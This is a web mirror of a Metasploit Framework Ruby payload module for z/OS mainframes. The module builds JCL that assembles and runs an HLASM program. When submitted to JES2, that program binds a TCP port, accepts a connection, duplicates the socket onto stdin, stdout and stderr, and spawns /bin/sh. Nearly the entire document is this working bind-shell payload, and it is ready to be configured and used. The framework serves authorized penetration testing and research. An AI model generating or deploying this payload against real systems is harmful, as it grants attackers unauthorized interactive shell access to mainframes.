CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/cmd/mainframe/bind_shell_jcl.rb
Views: 11777
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
# This payload has no ebcdic<->ascii translator built in.

5
# Therefore it must use a shell which does, like mainframe_shell

6
#

7
# this payload will spawn a bind shell from z/os, when submitted

8
#  on the system as JCL to JES2

9
##

10


11


12
module MetasploitModule

13
  CachedSize = 10712

14
  include Msf::Payload::Single

15
  include Msf::Payload::Mainframe

16
  include Msf::Sessions::CommandShellOptions

17


18
  def initialize(info = {})

19
    super(merge_info(info,

20
                     'Name'          => 'Z/OS (MVS) Command Shell, Bind TCP',

21
                     'Description'   => 'Provide JCL which creates a bind shell

22
                     This implementation does not include ebcdic character translation,

23
                     so a client with translation capabilities is required.  MSF handles

24
                     this automatically.',

25
                     'Author'        => 'Bigendian Smalls',

26
                     'License'       => MSF_LICENSE,

27
                     'Platform'      => 'mainframe',

28
                     'Arch'          => ARCH_CMD,

29
                     'Handler'       => Msf::Handler::BindTcp,

30
                     'Session'       => Msf::Sessions::MainframeShell,

31
                     'PayloadType'   => 'cmd',

32
                     'RequiredCmd'   => 'jcl',

33
                     'Payload'       =>

34
    {

35
      'Offsets' => {},

36
      'Payload' => ''

37
    }))

38
    register_options(

39
      [

40
        # need these defaulted so we can manipulate them in command_string

41
        Opt::LHOST('0.0.0.0'),

42
        Opt::LPORT(32700),

43
        OptString.new('ACTNUM', [true, "Accounting info for JCL JOB card", "MSFUSER-ACCTING-INFO"]),

44
        OptString.new('PGMNAME', [true, "Programmer name for JCL JOB card", "programmer name"]),

45
        OptString.new('JCLASS', [true, "Job Class for JCL JOB card", "A"]),

46
        OptString.new('NOTIFY', [false, "Notify User for JCL JOB card", ""]),

47
        OptString.new('MSGCLASS', [true, "Message Class for JCL JOB card", "Z"]),

48
        OptString.new('MSGLEVEL', [true, "Message Level for JCL JOB card", "(0,0)"])

49
      ], self.class

50
    )

51
    register_advanced_options(

52
      [

53
        OptBool.new('NTFYUSR', [true, "Include NOTIFY Parm?", false]),

54
        OptString.new('JOBNAME', [true, "Job name for JCL JOB card", "DUMMY"])

55
      ],

56
      self.class

57
    )

58
  end

59


60
  ##

61
  # Construct Payload

62
  ##

63
  def generate(_opts = {})

64
    super + command_string

65
  end

66


67
  ##

68
  # Setup replacement vars and populate payload

69
  ##

70
  def command_string

71
    if (datastore['JOBNAME'] == "DUMMY") && !datastore['FTPUSER'].nil?

72
      datastore['JOBNAME'] = (datastore['FTPUSER'] + "1").strip.upcase

73
    end

74
    lhost = Rex::Socket.resolv_nbo(datastore['LHOST'])

75
    lhost = lhost.unpack("H*")[0]

76
    lport = datastore['LPORT']

77
    lport = lport.to_s.to_i.to_s(16).rjust(4, '0')

78


79
    jcl_jobcard +

80
      "//**************************************/\n" \

81
      "//*  SPAWN BIND SHELL FOR MSF MODULE   */\n" \

82
      "//**************************************/\n" \

83
      "//*\n" \

84
      "//STEP1      EXEC PROC=ASMACLG,PARM.L=(CALL)\n" \

85
      "//L.SYSLIB   DD  DSN=SYS1.CSSLIB,DISP=SHR\n" \

86
      "//C.SYSIN    DD  *,DLM=ZZ\n" \

87
      "         TITLE  'Spawns Bind Shell'\n" \

88
      "SPAWNBND CSECT\n" \

89
      "SPAWNBND AMODE 31\n" \

90
      "SPAWNBND RMODE ANY\n" \

91
      "***********************************************************************\n" \

92
      "*        @SETUP registers and save areas                              *\n" \

93
      "***********************************************************************\n" \

94
      "         USING *,15\n" \

95
      "@SETUP0  B     @SETUP1\n" \

96
      "         DROP  15\n" \

97
      "         DS    0H                 # half word boundary\n" \

98
      "@SETUP1  STM   14,12,12(13)       # save our registers\n" \

99
      "         LR    2,13               # callers sa\n" \

100
      "         LR    8,15               # pgm base in R8\n" \

101
      "         USING @SETUP0,8          # R8 for base addressability\n" \

102
      "*************************************\n" \

103
      "* set up data area / addressability *\n" \

104
      "*************************************\n" \

105
      "         L     0,@DYNSIZE         # len of variable area\n" \

106
      "         GETMAIN RU,LV=(0)        # get data stg, len R0\n" \

107
      "         LR    13,1               # data address\n" \

108
      "         USING @DATA,13           # addressability for data area\n" \

109
      "         ST    2,@BACK            # store callers sa address\n" \

110
      "         ST    13,8(,2)           # store our data addr\n" \

111
      "         DS    0H                 # halfword boundaries\n" \

112
      "\n" \

113
      "***********************************************************************\n" \

114
      "*        BPX1SOC set up socket - inline                               *\n" \

115
      "***********************************************************************\n" \

116
      "         CALL  BPX1SOC,                                                X\n" \

117
      "               (DOM,TYPE,PROTO,DIM,SRVFD,                              X\n" \

118
      "               RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \

119
      "*******************************\n" \

120
      "*  chk return code, 0 or exit *\n" \

121
      "*******************************\n" \

122
      "         LHI   15,2\n" \

123
      "         L     6,RTN_VAL\n" \

124
      "         CIB   6,0,7,EXITP        # R6 not 0? Time to exit\n" \

125
      "\n" \

126
      "***********************************************************************\n" \

127
      "*        BPX1BND (bind) bind to local socket - inline                 *\n" \

128
      "***********************************************************************\n" \

129
      "         XC    SOCKADDR(16),SOCKADDR        # zero sock addr struct\n" \

130
      "         MVI   SOCK_FAMILY,AF_INET          # family inet\n" \

131
      "         MVI   SOCK_LEN,SOCK#LEN            # len of socket\n" \

132
      "         MVC   SOCK_SIN_PORT,CONNSOCK       # port to bind to\n" \

133
      "         MVC   SOCK_SIN_ADDR,CONNADDR       # address to bind to\n" \

134
      "         CALL  BPX1BND,                                                X\n" \

135
      "               (SRVFD,SOCKLEN,SOCKADDR,                                X\n" \

136
      "               RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \

137
      "*******************************\n" \

138
      "*  chk return code, 0 or exit *\n" \

139
      "*******************************\n" \

140
      "         LHI   15,3\n" \

141
      "         L     6,RTN_VAL\n" \

142
      "         CIB   6,0,7,EXITP        # R6 not 0? Time to exit\n" \

143
      "\n" \

144
      "***********************************************************************\n" \

145
      "*        BPX1LSN (listen) listen on local socket - inline             *\n" \

146
      "***********************************************************************\n" \

147
      "         CALL  BPX1LSN,                                                X\n" \

148
      "               (SRVFD,BACKLOG,                                         X\n" \

149
      "               RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \

150
      "*******************************\n" \

151
      "*  chk return code, 0 or exit *\n" \

152
      "*******************************\n" \

153
      "         LHI   15,4\n" \

154
      "         L     6,RTN_VAL\n" \

155
      "         CIB   6,0,7,EXITP        # R6 not 0? Time to exit\n" \

156
      "\n" \

157
      "***********************************************************************\n" \

158
      "*        BPX1ACP (accept) accept socket connection - inline           *\n" \

159
      "***********************************************************************\n" \

160
      "         XC    SOCKADDR(16),SOCKADDR        # zero sock addr struct\n" \

161
      "         MVI   SOCK_FAMILY,AF_INET          # family inet\n" \

162
      "         MVI   SOCK_LEN,SOCK#LEN            # len of socket\n" \

163
      "         CALL  BPX1ACP,                                                X\n" \

164
      "               (SRVFD,CLILEN,CLISKT,                                   X\n" \

165
      "               CLIFD,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \

166
      "*******************************\n" \

167
      "*  chk return code, 0 or exit *\n" \

168
      "*******************************\n" \

169
      "         LHI   15,5\n" \

170
      "         L     6,RTN_VAL\n" \

171
      "         CIB   6,0,7,EXITP        # R6 not 0? Time to exit\n" \

172
      "\n" \

173
      "*************************************************\n" \

174
      "* order of things to prep child pid             *\n" \

175
      "*  0) Dupe all 3 file desc of CLIFD             *\n" \

176
      "*  1) Dupe parent read fd to std input          *\n" \

177
      "*************************************************\n" \

178
      "*******************\n" \

179
      "*****  STDIN  *****\n" \

180
      "*******************\n" \

181
      "         CALL  BPX1FCT,                                                X\n" \

182
      "               (CLIFD,                                                 X\n" \

183
      "               =A(F_DUPFD2),                                           X\n" \

184
      "               =A(F_STDI),                                             X\n" \

185
      "               RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \

186
      "****************************************************\n" \

187
      "*  chk return code here anything but -1 is ok      *\n" \

188
      "****************************************************\n" \

189
      "         LHI   15,6               # exit code for this func\n" \

190
      "         L     7,RTN_VAL          # set r7 to rtn val\n" \

191
      "         CIB   7,-1,8,EXITP       # r6 = -1 exit\n" \

192
      "\n" \

193
      "*******************\n" \

194
      "*****  STDOUT *****\n" \

195
      "*******************\n" \

196
      "         CALL  BPX1FCT,                                                X\n" \

197
      "               (CLIFD,                                                 X\n" \

198
      "               =A(F_DUPFD2),                                           X\n" \

199
      "               =A(F_STDO),                                             X\n" \

200
      "               RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \

201
      "****************************************************\n" \

202
      "*  chk return code here anything but -1 is ok      *\n" \

203
      "****************************************************\n" \

204
      "         LHI   15,7               # exit code for this func\n" \

205
      "         L     7,RTN_VAL          # set r7 to rtn val\n" \

206
      "         CIB   7,-1,8,EXITP       # r6 = -1 exit\n" \

207
      "\n" \

208
      "*******************\n" \

209
      "*****  STDERR *****\n" \

210
      "*******************\n" \

211
      "         CALL  BPX1FCT,                                                X\n" \

212
      "               (CLIFD,                                                 X\n" \

213
      "               =A(F_DUPFD2),                                           X\n" \

214
      "               =A(F_STDE),                                             X\n" \

215
      "               RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \

216
      "****************************************************\n" \

217
      "*  chk return code here anything but -1 is ok      *\n" \

218
      "****************************************************\n" \

219
      "         LHI   15,8               # exit code for this func\n" \

220
      "         L     7,RTN_VAL          # set r7 to rtn val\n" \

221
      "         CIB   7,-1,8,EXITP       # r7 = -1 exit\n" \

222
      "\n" \

223
      "***********************************************************************\n" \

224
      "*        BP1SPN (SPAWN) execute shell '/bin/sh'                       *\n" \

225
      "***********************************************************************\n" \

226
      "         XC    INHE(INHE#LENGTH),INHE   # clear inhe structure\n" \

227
      "         XI    INHEFLAGS0,INHESETPGROUP\n" \

228
      "         SPACE ,\n" \

229
      "         MVC   INHEEYE,=C'INHE'\n" \

230
      "         LH    0,TLEN\n" \

231
      "         STH   0,INHELENGTH\n" \

232
      "         LH    0,TVER\n" \

233
      "         STH   0,INHEVERSION\n" \

234
      "         CALL  BPX1SPN,                                                X\n" \

235
      "               (EXCMDL,EXCMD,EXARGC,EXARGLL,EXARGL,EXENVC,EXENVLL,     X\n" \

236
      "               EXENVL,FDCNT,FDLST,=A(INHE#LENGTH),INHE,RTN_VAL,        X\n" \

237
      "               RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \

238
      "         LHI   15,9               # exit code for this func\n" \

239
      "         L     7,RTN_VAL          # set r7 to rtn val\n" \

240
      "         L     6,RTN_COD\n" \

241
      "         L     5,RSN_COD\n" \

242
      "         CIB   7,-1,8,EXITP       # r7 = -1 exit\n" \

243
      "\n" \

244
      "****************************************************\n" \

245
      "* cleanup & exit preload R15 with exit code        *\n" \

246
      "****************************************************\n" \

247
      "         XR    15,15              # 4 FOR rc\n" \

248
      "EXITP    L     0,@DYNSIZE\n" \

249
      "         LR    1,13\n" \

250
      "         L     13,@BACK\n" \

251
      "         DROP  13\n" \

252
      "         FREEMAIN RU,LV=(0),A=(1) #free storage\n" \

253
      "         XR    15,15\n" \

254
      "         L     14,12(,13)         # load R14\n" \

255
      "         LM    0,12,20(13)        # load 0-12\n" \

256
      "         BSM   0,14               # branch to caller\n" \

257
      "\n" \

258
      "****************************************************\n" \

259
      "* Constants and Variables                          *\n" \

260
      "****************************************************\n" \

261
      "         DS    0F                 # constants full word boundary\n" \

262
      "F_STDI   EQU   0\n" \

263
      "F_STDO   EQU   1\n" \

264
      "F_STDE   EQU   2\n" \

265
      "*************************\n" \

266
      "* Socket conn variables *         # functions used by pgm\n" \

267
      "*************************\n" \

268
      "CONNSOCK DC    XL2'#{lport}'      # LPORT\n" \

269
      "CONNADDR DC    XL4'#{lhost}'      # LHOST\n" \

270
      "BACKLOG  DC    F'1'               # 1 byte backlog\n" \

271
      "DOM      DC    A(AF_INET)         # AF_INET = 2\n" \

272
      "TYPE     DC    A(SOCK#_STREAM)    # stream = 1\n" \

273
      "PROTO    DC    A(IPPROTO_IP)      # ip = 0\n" \

274
      "DIM      DC    A(SOCK#DIM_SOCKET) # dim_sock = 1\n" \

275
      "SOCKLEN  DC    A(SOCK#LEN+SOCK_SIN#LEN)\n" \

276
      "CLILEN   DC    F'0'               # client sock len - don't care\n" \

277
      "CLISKT   DC    X'00'              # client socket struck - don't care\n" \

278
      "************************\n" \

279
      "* BPX1SPN vars *********\n" \

280
      "************************\n" \

281
      "EXCMD    DC    CL7'/bin/sh'       # command to exec\n" \

282
      "EXCMDL   DC    A(L'EXCMD)         # len of cmd to exec\n" \

283
      "EXARGC   DC    F'1'               # num of arguments\n" \

284
      "EXARG1   DC    CL2'sh'            # arg 1 to exec\n" \

285
      "EXARG1L  DC    A(L'EXARG1)        # len of arg1\n" \

286
      "EXARGL   DC    A(EXARG1)          # addr of argument list\n" \

287
      "EXARGLL  DC    A(EXARG1L)         # addr of arg len list\n" \

288
      "EXENVC   DC    F'0'               # env var count\n" \

289
      "EXENVL   DC    F'0'               # env var arg list addr\n" \

290
      "EXENVLL  DC    F'0'               # env var arg len addr\n" \

291
      "FDCNT    DC    F'0'               # field count s/b 0\n" \

292
      "FDLST    DC    F'0'               # field list addr s/b 0\n" \

293
      "TVER     DC    AL2(INHE#VER)\n" \

294
      "TLEN     DC    AL2(INHE#LENGTH)\n" \

295
      "         SPACE ,\n" \

296
      "@DYNSIZE DC    A(@ENDYN-@DATA)\n" \

297
      "***************************\n" \

298
      "***** end of constants ****\n" \

299
      "***************************\n" \

300
      "@DATA    DSECT ,\n" \

301
      "         DS    0D\n" \

302
      "PLIST    DS    16A\n" \

303
      "RTN_VAL  DS    F                  # return value\n" \

304
      "RTN_COD  DS    F                  # return code\n" \

305
      "RSN_COD  DS    F                  # reason code\n" \

306
      "CLIFD    DS    F                  # client fd\n" \

307
      "SRVFD    DS    F                  # server fd\n" \

308
      "@BACK    DS    A\n" \

309
      "*\n" \

310
      "         BPXYSOCK   LIST=NO,DSECT=NO\n" \

311
      "         BPXYFCTL   LIST=NO,DSECT=NO\n" \

312
      "         BPXYINHE   LIST=NO,DSECT=NO\n" \

313
      "@ENDYN   EQU   *\n" \

314
      "@DATA#LEN EQU  *-@DATA\n" \

315
      "         BPXYCONS   LIST=YES\n" \

316
      "         END   SPAWNBND\n" \

317
      "ZZ\n" \

318
      "//*\n"

319
  end

320
end

321


322